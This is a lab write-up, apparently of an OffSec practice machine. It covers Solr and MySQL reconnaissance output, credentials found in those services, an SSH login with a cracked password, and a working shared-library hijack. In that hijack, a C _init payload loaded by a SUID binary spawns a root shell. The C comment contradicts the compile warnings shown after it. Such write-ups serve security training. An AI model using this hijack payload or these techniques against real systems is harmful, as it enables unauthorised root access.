Key takeaways
- Exploiting a Solr misconfiguration
- Password brute-forcing
- Privilege escalation via shared-library hijacking
Detailed steps
Information gathering
The nmap scan shows ports 22, 3306 and 8983 open, so the host is probably running SSH, MySQL and an as yet unidentified application:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 23:42 UTC
Nmap scan report for 192.168.55.205
Host is up (0.00051s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA)
|_ 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519)
3306/tcp open mysql MySQL 8.0.41-0ubuntu0.24.04.1
| mysql-info:
| Protocol: 10
| Version: 8.0.41-0ubuntu0.24.04.1
| Thread ID: 11
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, ODBCClient, InteractiveClient, LongColumnFlag, Speaks41ProtocolOld, SwitchToSSLAfterHandshake, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, LongPassword, SupportsCompression, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: U\x12(egs3&G1\x11`\x025\x1A\x1FIyF_
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.41_Auto_Generated_Server_Certificate
| Not valid before: 2025-02-17T15:27:47
|_Not valid after: 2035-02-15T15:27:47
|_ssl-date: TLS randomness does not represent time
8983/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest, HTTPOptions:
| HTTP/1.1 302 Found
| Location: /solr/
| Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 HTTP Version Not Supported
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq, TLSSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x3</pre>
The nikto scan reveals a /solr/ path:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.55.205
+ Target Hostname: 192.168.55.205
+ Target Port: 8983
+ Start Time: 2025-02-20 23:50:23 (GMT0)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: /solr/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: jetty (5.1.14). See: https://en.wikipedia.org/wiki/Favicon
+ /solr/#/: Apache Solr console found.
+ 8103 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2025-02-20 23:50:34 (GMT0) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Visiting the /solr/ path on port 8983 shows that Solr 9.7.0 is installed.
Breaking the perimeter
Browsing around the Solr interface turns up a username and password.
These credentials log in to MySQL successfully, and inside MySQL further credentials can be found.
Although I was not able to brute-force it, I found a wordlist on Google that contained the hash of bob's password, which gave bob's password, sunflower; with it I could log in over SSH successfully.
C:\home\kali\Documents\OFFSEC\GoToWork\dev_working> ssh bob@192.168.163.205
bob@192.168.163.205's password:
......
......
BSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ bash
bob@dev01:~$
Privilege escalation
First, bob has no sudo rights, but there is a SUID executable /home/bob/backup owned by root, so this is a potential privilege-escalation point:
$ find / -type f -perm -4000 2>/dev/null
......
......
/home/bob/backup
$ ls -lart
total 48
-rw-r--r-- 1 bob bob 807 Mar 31 2024 .profile
-rw-r--r-- 1 bob bob 3771 Mar 31 2024 .bashrc
-rw-r--r-- 1 bob bob 220 Mar 31 2024 .bash_logout
drwxr-xr-x 4 root root 4096 Feb 17 14:58 ..
-rwsr-xr-x 1 root root 14472 Feb 17 15:28 backup
-rw-r--r-- 1 root root 52 Feb 17 15:28 mydata.txt
lrwxrwxrwx 1 root root 9 Feb 17 15:28 .bash_history -> /dev/null
-rw-r--r-- 1 bob bob 33 Feb 20 23:52 local.txt
drwx------ 2 bob bob 4096 Feb 21 00:24 .cache
drwxr-x--- 3 bob bob 4096 Feb 21 00:24 .
Running backup prompts for a password, so first inspect the strings in the backup binary. That yields the password B4cup32M4n4age and shows that backup loads ./lib_backup.so when it runs. Because that relative path is resolved from the current working directory, which here is bob's own writable home directory, the approach is clear: plant our own lib_backup.so there to escalate privileges.
$ strings backup
......
......
Welcome to the Gagup Backup Manager!
Are you sure you want to back up the file
Error creating destination folder
Error opening destination file
Backup completed successfully.
Advanced Backup Tool: Use with care.
Are you sure you want to proceed with the advanced backup? (yes/no or y/n):
advance_backup_custom_implementation
Incorrect password. Exiting...
/home/bob/backup_history
%s/%s
/home/bob/mydata.txt
[1;%sm%s
to
? (yes/no or y/n):
Backup cancelled.
Error opening source file
Backed up:
Advanced backup cancelled.
./lib_backup.so
Advanced backup completed
Enter the password:
%255s
B4cup32M4n4age
===== Backup Menu =====
1. Simple Backup
2. Advanced Backup
3. Exit
Choose an option:
Exiting... Goodbye!
Create a file lib_backup.c in /home/bob with the following content:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* declares setgid/setuid; without it gcc warns about implicit declarations */

/* _init runs as soon as the set-uid backup binary loads this shared object */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Compile it:
bob@dev01:~$ touch lib_backup.c
bob@dev01:~$ vi lib_backup.c
bob@dev01:~$ gcc -fPIC -shared -o lib_backup.so lib_backup.c -nostartfiles
lib_backup.c: In function ‘_init’:
lib_backup.c:7:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
7 | setgid(0);
| ^~~~~~
lib_backup.c:8:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
8 | setuid(0);
| ^~~~~~
bob@dev01:~$ ls -l
total 48
-rwsr-xr-x 1 root root 14472 Feb 17 15:28 backup
drwx------ 2 root bob 4096 Feb 21 00:34 backup_history
-rw-rw-r-- 1 bob bob 163 Feb 21 00:46 lib_backup.c
-rwxrwxr-x 1 bob bob 14328 Feb 21 00:46 lib_backup.so
-rw-r--r-- 1 bob bob 33 Feb 20 23:52 local.txt
-rw-r--r-- 1 root root 52 Feb 17 15:28 mydata.txt
Run backup; the privilege escalation succeeds:
bob@dev01:~$ ./backup
██████╗ █████╗ ██████╗ ██╗ ██╗██████╗
██╔════╝ ██╔══██╗██╔════╝ ██║ ██║██╔══██╗
██║ ███╗███████║██║ ███╗██║ ██║██████╔╝
██║ ██║██╔══██║██║ ██║██║ ██║██╔═══╝
╚██████╔╝██║ ██║╚██████╔╝╚██████╔╝██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝
Welcome to the Gagup Backup Manager!
Enter the password: > B4cup32M4n4age
===== Backup Menu =====
1. Simple Backup
2. Advanced Backup
3. Exit
Choose an option: 2
Advanced Backup Tool: Use with care.
Are you sure you want to proceed with the advanced backup? (yes/no or y/n): yes
root@dev01:~# id
uid=0(root) gid=0(root) groups=0(root),1001(bob)